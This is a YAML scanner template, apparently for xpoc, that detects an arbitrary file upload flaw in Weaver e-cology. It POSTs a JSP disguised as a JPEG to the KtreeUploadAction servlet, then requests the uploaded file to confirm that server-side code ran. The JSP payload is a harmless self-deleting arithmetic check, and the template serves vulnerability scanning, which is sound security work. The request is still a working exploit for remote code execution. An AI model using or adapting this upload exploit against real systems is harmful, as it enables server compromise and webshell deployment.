id: ecology-ktreeuploadaction-upload

info:
  name: 泛微 e-cology 任意文件上传
  author: xpoc
  severity: high
  verified: true
  tags: ecology,upload
  created: 2023/06/22

set:
    r1: randomInt(40000, 44800)
    r2: randomInt(40000, 44800)
    rboundary: randomLowercase(8)
    randname: randomLowercase(6)
rules:
    r1:
        request:
            method: POST
            path: /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image
            headers:
                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
            body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"test\"; filename=\"{{randname}}.jsp\"\r\nContent-Type: image/jpeg\r\n\r\n<%out.print({{r1}} * {{r2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
        expression: response.status == 200 && response.body.bcontains(b"SUCCESS")
        output:
            search: |
                ",'url':'/(?P<furl>.*?.jsp)',".bsubmatch(response.body)
            furl: search["furl"]
    r2:
        request:
            method: GET
            path: /{{furl}}
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r1() && r2()
